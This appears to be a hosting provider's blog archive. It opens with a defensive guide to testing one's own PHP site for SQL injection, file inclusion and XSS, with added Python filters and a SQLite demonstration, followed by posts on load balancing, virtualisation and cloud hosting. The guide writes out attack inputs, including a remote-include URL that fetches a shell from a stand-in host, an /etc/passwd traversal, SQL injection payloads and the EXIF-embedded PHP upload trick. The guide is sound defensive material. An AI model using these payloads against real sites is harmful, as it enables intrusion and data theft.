Aug 10

Number 1: if you are using a common CMS, search for its name together with the word "exploit" and make sure your version is not listed. An exploit database or the vendor's own advisories are a better source than a general web search, and the only real fix is keeping the CMS and its plugins patched.

Next, take every GET variable your scripts accept and put a ' at the end of it. What I mean is, where you have page= you add ', so it becomes something like yourwebsite.com/page.php?id=1' (and likewise for every other parameter, not only page=). Try char(39) as well as the literal '. Most PHP scripts run their input through addslashes() before it reaches the MySQL query, which puts a backslash in front of the ' so that it can no longer terminate the string literal; but that protects only values that the query wraps in quotes. A value pasted into a numeric context such as WHERE id=$id needs no quote at all, and MySQL's CHAR(39) evaluates to a ' on the database side without the attacker ever sending one, so a script that relies on addslashes() alone is still vulnerable to SQL injection.
If you get an error, check the script that handles that parameter.

If the error mentions mysql_* (mysql_fetch_array(), mysql_num_rows() and friends), that is SQL injection: get right on to fixing it, because someone would have the ability to dump your whole database, clients, admins, etc. The absence of an error does not prove a script is safe, either; blind SQL injection produces no error at all, so treat this test as a quick screen rather than a clean bill of health.

If the errors mention main() or a failed include (the warnings PHP's include() and require() emit), you may have just found an LFI (Local File Inclusion) or RFI (Remote File Inclusion). If the message shows a local path, such as failed to include /test/file.ext, this is an LFI, and it is very useful to a hacker: they have the ability to walk up the directory tree with ../../../../ and, if they wanted to, view your passwd file via ../../../../../../etc/passwd.

Right now you might say "big whoop, they got a list of users", but it does not stop there. They still have the ability to go to any forum on that server, upload an avatar with PHP code hidden in its EXIF data, and then include that file through the same LFI. Because include() executes whatever it reads, the code inside the image runs, meaning they can now run PHP code on your server, which is not good at all.

Recommendations: fix the script so that it only ever includes files from a fixed list of its own and never builds the path from user input, and have mod_security block requests containing ../ sequences (matched after URL decoding, or the attacker simply sends %2e%2e%2f instead) as a second layer.

Next we're going to discuss what an RFI gives an attacker and how to block it.
With an RFI the attacker remotely includes a PHP file of their own, like so: www.yoursite.com/file.php?file=evilsite.com/shell.txt? (in practice with the full URL, http://evilsite.com/shell.txt?, since PHP needs the http:// wrapper to fetch a remote file). The script on your server then fetches the remote file and executes the PHP code it contains, giving the attacker the same access to your server that your own scripts have. The trailing ? turns anything the script appends to the path, such as .php, into a query string for the attacker's server, so it is ignored.

Prevention: the real fix is to set allow_url_include = Off (and, unless you need it, allow_url_fopen = Off) in php.ini so that include() cannot fetch a URL at all, and to stop building include paths from user input. On top of that, add http:// (and https://, ftp://, and PHP's own stream wrappers such as php:// and data:) to your mod_security rules, so that an attempt to pass a remote URL in the query string is blocked before it reaches the script.
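The filtering the post recommends for mod_security, and the fix it asks for in the script itself, as an added example in Python that is not part of the original post. The allow-list table, the /var/www/pages directory, the parameter names and the sample query strings are all constructed for the illustration; the wrapper names in REMOTE (php:, data:, expect:, phar:, zip:, glob:) are real PHP stream wrappers. Python is used instead of PHP so that the checks run without a web stack.

```python
import os
import re
from urllib.parse import parse_qs, unquote

# Names a script may include, keyed by the value the user is allowed to send.
# The fix for LFI is an allow-list like this, not a filter on the input.
# (Constructed for the example; not from the original post.)
PAGE_ALLOWLIST = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

# What the post recommends blocking in mod_security, written as Python so it
# can be tested: ../ (or ..\) as a path component, and URLs or PHP stream
# wrappers that would turn an include into a remote fetch.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
REMOTE = re.compile(r"^\s*(?:https?|ftp|ftps|php|data|expect|phar|zip|glob):",
                    re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %2e%2e%2f and the
    double-encoded %252e%252e%252f both become ../ before the patterns run."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def blocked_reason(query_string: str):
    """Return why a query string should be rejected, or None if it looks clean."""
    params = parse_qs(query_string, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = fully_decode(raw)
            if "\x00" in value:                 # classic extension-cutting trick
                return f"{name}: null byte"
            if TRAVERSAL.search(value):
                return f"{name}: directory traversal"
            if REMOTE.search(value):
                return f"{name}: remote URL or stream wrapper"
    return None


def resolve_page(name: str):
    """Allow-list lookup: anything not in the table is simply not a page."""
    return PAGE_ALLOWLIST.get(name)


def is_confined(base_dir: str, requested: str) -> bool:
    """For includes that must stay dynamic: resolve the request under base_dir
    and check that the real path is still inside it, whatever ../ or encoding
    tricks were used. The paths need not exist; realpath normalises lexically."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, fully_decode(requested)))
    return os.path.commonpath([base, target]) == base


def safe_include_path(base_dir: str, requested: str) -> str:
    """Path to hand to include(), or PermissionError if it escapes base_dir."""
    if not is_confined(base_dir, requested):
        raise PermissionError("refusing to include %r: outside %s" % (requested, base_dir))
    base = os.path.realpath(base_dir)
    return os.path.realpath(os.path.join(base, fully_decode(requested)))


if __name__ == "__main__":
    # Constructed sample requests, including the two from the post.
    for qs in ("page=home",
               "file=../../../../../../etc/passwd",
               "file=%252e%252e%252fetc%252fpasswd",
               "file=http://evilsite.com/shell.txt?",
               "file=php://input",
               "file=avatar%00.jpg"):
        print(f"{qs:45} -> {blocked_reason(qs)}")
    print(safe_include_path("/var/www/pages", "home.php"))
```

blocked_reason() is the mod_security-style safety net and resolve_page() or is_confined() is the fix in the script; the filter on its own is bypassable by whatever encoding the next attacker thinks of, which is why the post is right to say "fix the script" first.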

Our next subject is XSS, cross-site scripting. With XSS an attacker gets JavaScript of their own to run in your website's pages, in the browsers of your users. The worst form is stored (permanent) XSS: it lets users embed their JavaScript inside something where you wouldn't really see it, such as a forum post or a profile field, and when you open that page the script runs and can grab your cookie or other data the browser holds for the site. With your session cookie they can use it as their own and log in as you, and if the cookie carries password information they get that too. The fix is to HTML-encode every piece of user-supplied data at the point where you output it (htmlspecialchars() in PHP), and to mark session cookies HttpOnly so that script cannot read them at all.

As for SQL injection, the way to block it with mod_security is to add rules for ' and /*, and be sure to include char(39) as well: a script that escapes the literal quote will still run a query in which MySQL evaluates CHAR(39) to a ' on its side. Treat those rules as a safety net only. The real fix is to stop building SQL strings out of user input and use prepared statements (mysqli or PDO with bound parameters), or at the very least cast numeric parameters to integers before they reach the query.
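The addslashes() versus CHAR(39) point made above, and the prepared-statement fix, as an added example in Python on an in-memory SQLite database; this is not code from the original post, and SQLite stands in for MySQL so that it runs offline (the users table and its two rows are constructed for the illustration). SQLite escapes a quote by doubling it where MySQL and addslashes() use a backslash, and its char() function plays the part of MySQL's CHAR(), but the lesson is the same: escaping only protects a value that the query wraps in quotes.

```python
import sqlite3


def make_db():
    """Constructed sample data, not from the original post."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return db


def escape(value):
    """Quote escaping in the spirit of PHP's addslashes(). SQLite doubles a
    single quote where MySQL uses a backslash, but the effect is the same:
    the quote can no longer terminate a string literal."""
    return str(value).replace("'", "''")


def find_by_name_raw(db, name):
    # No escaping at all: the "append a quote" probe produces a syntax error here.
    sql = "SELECT id, username FROM users WHERE username = '%s' ORDER BY id" % name
    return db.execute(sql).fetchall()


def find_by_name_escaped(db, name):
    # Quoted string context: escaping is enough to keep the value inside the literal.
    sql = "SELECT id, username FROM users WHERE username = '%s' ORDER BY id" % escape(name)
    return db.execute(sql).fetchall()


def find_by_id_escaped(db, id_value):
    # Numeric context, value pasted in unquoted. Escaping changes nothing because
    # the attacker never has to send a quote: "0 OR 1=1" needs none, and
    # char(97,100,109,105,110) evaluates to 'admin' on the database side.
    sql = "SELECT id, username FROM users WHERE id = %s ORDER BY id" % escape(id_value)
    return db.execute(sql).fetchall()


def find_by_id_param(db, id_value):
    # The fix: a parameterised query. The value is bound as data and is never
    # parsed as SQL, whatever it contains.
    sql = "SELECT id, username FROM users WHERE id = ? ORDER BY id"
    return db.execute(sql, (id_value,)).fetchall()


def quote_probe(db, query):
    """The manual test from the post: append a single quote to the parameter
    and see whether the database complains. Returns the error text, or None."""
    try:
        query(db, "1'")
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    print("probe, raw       :", quote_probe(db, find_by_name_raw))
    print("probe, escaped   :", quote_probe(db, find_by_name_escaped))
    print("string context   :", find_by_name_escaped(db, "' OR '1'='1"))
    print("numeric context  :", find_by_id_escaped(db, "0 OR 1=1"))
    print("via char()       :", find_by_id_escaped(db, "0 OR username = char(97,100,109,105,110)"))
    print("parameterised    :", find_by_id_param(db, "0 OR 1=1"))
```

Note that find_by_name_escaped() passes the probe and survives the classic ' OR '1'='1 payload, yet the same escape() function leaves find_by_id_escaped() wide open; the difference is entirely in whether the query quotes the value, which is exactly what a WAF rule on ' cannot see.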

One other thing you can do, which is not strictly necessary but helps if someone does manage to read files off your website, is to obfuscate db.php, conf.php and similar configuration files with Zend Guard or a similar encoder, so that the MySQL credentials and any other usernames and passwords you might reuse cannot simply be read off the disk. Be clear about what this buys you: it is obfuscation, not encryption. The PHP interpreter has to recover the credentials in order to use them, so anyone who can execute code on the server (for example through the LFI or RFI above) can recover them too. Better still, do not reuse those passwords anywhere else, and give the database account only the privileges the site actually needs.

Finally, never leave an open upload script anywhere. Any open upload script on your website gives the hacker/attacker the ability to put a file of their choosing onto your server. Sure, you can restrict them to uploading JPG, GIF, RAR and so on,
but unless your upload script also checks for EXIF and other metadata and clears it out of the image as it is saved, the attacker still has something to use against you: the PHP hidden in the EXIF data survives, and an LFI will run it. Stripping metadata is not enough on its own, either. Check that the file really is an image by content rather than by the extension the client sent, give it a new server-chosen name and extension, and store it somewhere the web server will never execute or include it.

Jul 27

Load balancing

Load balancing allows your website to keep performing in the event of server downtime due to server failure or planned maintenance. A managed server load-balancing service delivers:

  • Load balancing to improve performance through efficient distribution of network traffic
  • Firewalls in High Availability configuration
  • Web servers arranged in active-active or active-passive pairs to provide failover redundancy
  • Database servers replicated or clustered for reliability and performance
  • Improved performance for your website and applications
  • Service continuity in the event of a server failure

Load balancing is fully configurable to meet your requirements. You can specify round-robin, weighted round-robin, least connections or least sessions load balancing methods as well as stickiness based on IP address, cookie, session ID.

Jul 23

Cloud service host Rackspace is adding API access to its hosted clouds, to give cloud service suppliers more control and flexibility over their hosted servers.

Rackspace offers Cloud Server hosting to cloud service provider customers, using technology from its Slicehost subsidiary. Customers currently manage their servers through a Control Panel GUI.

The coming API, built using a RESTful web service interface, will enable customers to have better control of their server instances in the Rackspace hosting centres. They will be able to write code that programmatically detects server load and scales the number of server instances up and down, for example.

The API introduces features that the Control Panel does not have. One is the ability to specify files when a server instance is created that will be injected into the server file system before startup. Rackspace says this is useful when inserting SSH keys, setting configuration files, or storing data that customers want to retrieve from within the Cloud Server itself.

A second new feature refers to identification of the server host. The Cloud Servers provisioning algorithm attempts to spread out customer virtual machines across hosts. Under certain situations, Cloud Servers from the same customer may be placed on the same host. Host identification allows customers to detect this condition and take appropriate action.

The API also makes it simpler to create shared IP groups and enable high availability configurations. Showing that it is au fait with iPhone popularity, Rackspace customers will be able to manage their clouds with an iPhone

Jul 19

The architecture of OpenVZ differs from that of traditional virtual machines because every container runs on the same OS kernel as the host system (while still allowing different Linux distributions in individual containers). This single-kernel design lets containers run with near-zero overhead, so OpenVZ offers an order of magnitude better efficiency and manageability than traditional virtualization technologies.

From the point of view of applications and container users, each container is an independent system. This independence is provided by a virtualization layer in the kernel of the host OS. Note that only a negligible part of the CPU resources (around 1-2%) is spent on virtualization. The main features of the virtualization layer implemented in OpenVZ are the following:

  • A container looks and behaves like a regular Linux system. It has standard startup scripts; software from vendors can run inside a container without OpenVZ-specific modifications or adjustment;
  • A user can change any configuration file and install additional software;
  • Containers are isolated from each other (file system, processes, Inter Process Communication (IPC), sysctl variables). Because all containers share one kernel, that isolation is only as strong as the kernel itself: a kernel vulnerability reachable from inside a container affects every container on the host, a risk that a hypervisor with separate guest kernels does not share;
  • Processes belonging to a container are scheduled for execution on all available CPUs, so containers (CTs) are not bound to a single CPU and can use all available CPU power.

Live migration and checkpointing were released for OpenVZ in mid-April 2006. They allow a container to be migrated from one physical server to another without shutting it down or restarting it. The process is known as checkpointing: a CT is frozen and its whole state is saved to a file on disk. That file can then be transferred to another machine and the CT unfrozen (restored) there. The delay is a few seconds, and it is a pause rather than downtime.

OpenVZ is free open source software, available under GNU GPL. OpenVZ is the basis of Parallels Virtuozzo Containers, a commercial virtualization solution offered by Parallels.

Jul 03

A Xen system is structured with the Xen hypervisor as the lowest and most privileged layer. Above this layer are one or more guest operating systems, which the hypervisor schedules across the physical CPUs. The first guest operating system, called "domain 0" (dom0) in Xen terminology, is booted automatically when the hypervisor boots and is given special management privileges and direct access to the physical hardware. The system administrator logs into dom0 to manage any further guest operating systems, called "domain U" (domU) in Xen terminology. That makes dom0 the trust anchor of the whole host: whoever controls it controls every guest, so it should run as little software, and accept as few logins, as possible.

On most CPUs, Xen uses a form of virtualization known as paravirtualization, meaning that the guest operating system must be modified to use a special hypercall ABI instead of certain architectural features. Through paravirtualization, Xen can achieve high performance even on its host architecture (x86) which is notoriously uncooperative with traditional virtualization techniques.

Both Intel and AMD have contributed modifications to Xen to support their AMD-V and Intel VT architecture extensions. This has been a significant development because it allows proprietary operating systems (such as Microsoft Windows) to be virtualized since the guest system’s kernel does not require modification when the host runs on Intel VT or AMD-V hardware.

Xen virtual machines can be “live migrated” between physical hosts across a LAN without loss of availability. During this procedure, the memory of the virtual machine is iteratively copied to the destination without stopping its execution. Stoppage of around 60–300 ms is required to perform final synchronization before the virtual machine begins executing at its final destination, providing an illusion of seamless migration.

Jun 17

Everyone these days is familiar with the hype and buzz surrounding cloud computing; if you're not, I suggest reading the Wikipedia article! The "cloud" abstracts the technology, specifically the hardware, away from the end user. It is useful because a web developer no longer has to think about disk failures or similar when developing an application; they just need to write the application so that it scales. As long as the application is written in the correct way, a disk failure won't cause any downtime, because the application is hosted on a cloud, and the cloud mitigates hardware failure by detecting issues as they happen and migrating live virtual servers (your VDS/VPS) over to spare hardware.

Some of the big players in the market include Amazon’s EC2, Rackspace’s Cloud Servers, Flexiscale plus many others. With the release of software like Eucalyptus, it looks like the marketplace may become even more crowded as barriers to entry fall because less original development will be required to set up your own “cloud” of servers.

Jun 12

HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software is seriously flawed. Security-wise, numerous critical vulnerability updates have been released, and any provider that was slow with their server updates will have found their systems extremely vulnerable to attack.

This culminated in the recent hack of A2B2/Vaserv/FSCK VPS, where tens of thousands of websites were taken offline on multiple servers by exploiting a serious vulnerability in the HyperVM virtual machine management software:
http://www.theregister.co.uk/2009/06/08/webhost_attack/

Whilst automation is an important part of an efficient system, it is even more important to ensure that the integrity of that system is not compromised by the automation itself. In this instance a single installation of HyperVM with root access to many dozens of servers was compromised, so one break-in became a break-in everywhere. It is important to consider worst-case scenarios with any kind of service: what is the absolute worst that could happen to my system? What would be my nightmare?

Think of your nightmare… and then multiply it a few times. Then make a contingency plan.

May 22

Typical virtual dedicated hosting hardware is a very powerful machine, so that when the server is "sliced up" each slice still performs well. Typically you will want multiple quad-core CPUs with 8GB+ of RAM. However, the key piece of hardware that most people overlook when looking for a VPS or VDS host is the disks. Hard disks are still the bottleneck in most systems, and when the disks are busy the CPU can do little but wait. You can have all the CPU power in the world, but with slow disks it will never be able to do anything useful, especially when it comes to hosting.

We would generally recommend multiple SAS (Serial Attached SCSI) disks in a RAID10 configuration. The more disks in the RAID10 array, the better the overall performance. Fast disks make for a system that "feels" a lot faster and give it the edge over systems using much slower SATA disks.

Apr 27

A virtual dedicated server (VDS or VPS) can run a number of operating systems. To the operating system, the "virtual machine" appears to be real hardware, so you can install any operating system compatible with the x86 virtual machine that the virtualization manager provides (this holds for hypervisor-based virtualization such as Xen; OpenVZ containers share the host kernel and can therefore only run Linux). So you can have any flavour of Linux (CentOS, Ubuntu, etc.), or you can even install Windows, typically Server 2003 Web Edition or Standard. On top of this you can then install your favourite control panel, for instance cPanel (http://cpanel.net), Plesk, or LXadmin (if you want a free one).

It is recommended, however, that if you choose Windows as the operating system you assign the virtual machine at least 512MB of RAM so that it can operate efficiently without constantly using hard disk swap. The increase in performance over a machine with less RAM is significant.

Apr 20

A virtual dedicated server (VDS, also referred to as Virtual Private Server or VPS) is a method of partitioning a physical server computer into multiple “virtual” servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server can be independently controlled/rebooted/resized/migrated.

There are two kinds of virtualisation: operating-system level (container based) and hypervisor based. In a container-based environment the virtual machines share the host's kernel and draw directly on the main node's resources. This kind of virtualization has many benefits in a web hosting environment because quotas can be increased and decreased in real time with no need to restart the node. The main container examples are Virtuozzo, VServer and OpenVZ (the open source development version of Parallels Virtuozzo Containers); Xen, by contrast, is a hypervisor that gives each guest its own kernel.
